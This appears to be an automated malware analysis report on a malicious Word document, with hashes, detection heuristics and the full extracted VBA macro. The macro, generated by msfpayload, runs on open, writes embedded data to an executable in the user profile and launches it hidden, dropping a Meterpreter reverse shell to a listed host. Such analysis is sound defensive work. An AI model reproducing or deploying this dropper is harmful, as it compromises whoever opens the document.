Office (OLE) malware analysis — malicious · 8805ffed5a14a6df

MALICIOUS

Office (OLE)

323.5 KB Created: 2014-08-27 21:03:00 Authoring application: Microsoft Office Word First seen: 2015-10-06

MD5: b4316ed2ef5af18e7d72bb0f354f3c61 SHA-1: b16255123891df7c52c1f1195091995fb4600028 SHA-256: 8805ffed5a14a6dfdff0ee29dc53610e520fbfb5046d4b21031c7d15c9bdc4d6

294 Risk Score

Heuristics 11

ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
VBA macros detected medium 7 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
    Mihpe7 = Shell(Mihpe10, vbHide)
```
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL

VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
Matched line in script
```
    Mihpe7 = Shell(Mihpe10, vbHide)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    Mihpe2 = Environ("USERPROFILE")
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.metasploit.com).� Referenced by macro
- http://www.metasploit.comReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2346 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2346 bytes
SHA-256: `28de77528e9bbc779d74a0b0e7bff1e271633e342cdc43e5c05f98a867ccca2f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True 'Created by msfpayload (http://www.metasploit.com). 'Payload: windows/meterpreter/reverse_tcp ' Length: 287 'Options: {"LHOST"=>"192.168.246.189"} '************************************************************** '* '* This code is now split into two pieces: '* 1. The Macro. This must be copied into the Office document '* macro editor. This macro will run on startup. '* '* 2. The Data. The hex dump at the end of this output must be '* appended to the end of the document contents. '* '************************************************************** '* '* MACRO CODE '* '************************************************************** Sub Auto_Open() Mihpe12 End Sub Sub Mihpe12() Dim Mihpe7 As Integer Dim Mihpe1 As String Dim Mihpe2 As String Dim Mihpe3 As Integer Dim Mihpe4 As Paragraph Dim Mihpe8 As Integer Dim Mihpe9 As Boolean Dim Mihpe5 As Integer Dim Mihpe11 As String Dim Mihpe6 As Byte Dim Niofvkcgmy As String Niofvkcgmy = "Niofvkcgmy" Mihpe1 = "yrdiLEvO.exe" Mihpe2 = Environ("USERPROFILE") ChDrive (Mihpe2) ChDir (Mihpe2) Mihpe3 = FreeFile() Open Mihpe1 For Binary As Mihpe3 For Each Mihpe4 In ActiveDocument.Paragraphs DoEvents Mihpe11 = Mihpe4.Range.Text If (Mihpe9 = True) Then Mihpe8 = 1 While (Mihpe8 < Len(Mihpe11)) Mihpe6 = Mid(Mihpe11, Mihpe8, 4) Put #Mihpe3, , Mihpe6 Mihpe8 = Mihpe8 + 4 Wend ElseIf (InStr(1, Mihpe11, Niofvkcgmy) > 0 And Len(Mihpe11) > 0) Then Mihpe9 = True End If Next Close #Mihpe3 Mihpe13 (Mihpe1) End Sub Sub Mihpe13(Mihpe10 As String) Dim Mihpe7 As Integer Dim Mihpe2 As String Mihpe2 = Environ("USERPROFILE") ChDrive (Mihpe2) ChDir (Mihpe2) Mihpe7 = Shell(Mihpe10, vbHide) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub

SHA-256: 28de77528e9bbc779d74a0b0e7bff1e271633e342cdc43e5c05f98a867ccca2f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Created by msfpayload (http://www.metasploit.com).
'Payload: windows/meterpreter/reverse_tcp
' Length: 287
'Options: {"LHOST"=>"192.168.246.189"}

'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
'**************************************************************
'*
'* MACRO CODE
'*
'**************************************************************

Sub Auto_Open()
    Mihpe12
End Sub

Sub Mihpe12()
    Dim Mihpe7 As Integer
    Dim Mihpe1 As String
    Dim Mihpe2 As String
    Dim Mihpe3 As Integer
    Dim Mihpe4 As Paragraph
    Dim Mihpe8 As Integer
    Dim Mihpe9 As Boolean
    Dim Mihpe5 As Integer
    Dim Mihpe11 As String
    Dim Mihpe6 As Byte
    Dim Niofvkcgmy As String
    Niofvkcgmy = "Niofvkcgmy"
    Mihpe1 = "yrdiLEvO.exe"
    Mihpe2 = Environ("USERPROFILE")
    ChDrive (Mihpe2)
    ChDir (Mihpe2)
    Mihpe3 = FreeFile()
    Open Mihpe1 For Binary As Mihpe3
    For Each Mihpe4 In ActiveDocument.Paragraphs
        DoEvents
            Mihpe11 = Mihpe4.Range.Text
        If (Mihpe9 = True) Then
            Mihpe8 = 1
            While (Mihpe8 < Len(Mihpe11))
                Mihpe6 = Mid(Mihpe11, Mihpe8, 4)
                Put #Mihpe3, , Mihpe6
                Mihpe8 = Mihpe8 + 4
            Wend
        ElseIf (InStr(1, Mihpe11, Niofvkcgmy) > 0 And Len(Mihpe11) > 0) Then
            Mihpe9 = True
        End If
    Next
    Close #Mihpe3
    Mihpe13 (Mihpe1)
End Sub

Sub Mihpe13(Mihpe10 As String)
    Dim Mihpe7 As Integer
    Dim Mihpe2 As String
    Mihpe2 = Environ("USERPROFILE")
    ChDrive (Mihpe2)
    ChDir (Mihpe2)
    Mihpe7 = Shell(Mihpe10, vbHide)
End Sub

Sub AutoOpen()
    Auto_Open
End Sub

Sub Workbook_Open()
    Auto_Open
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.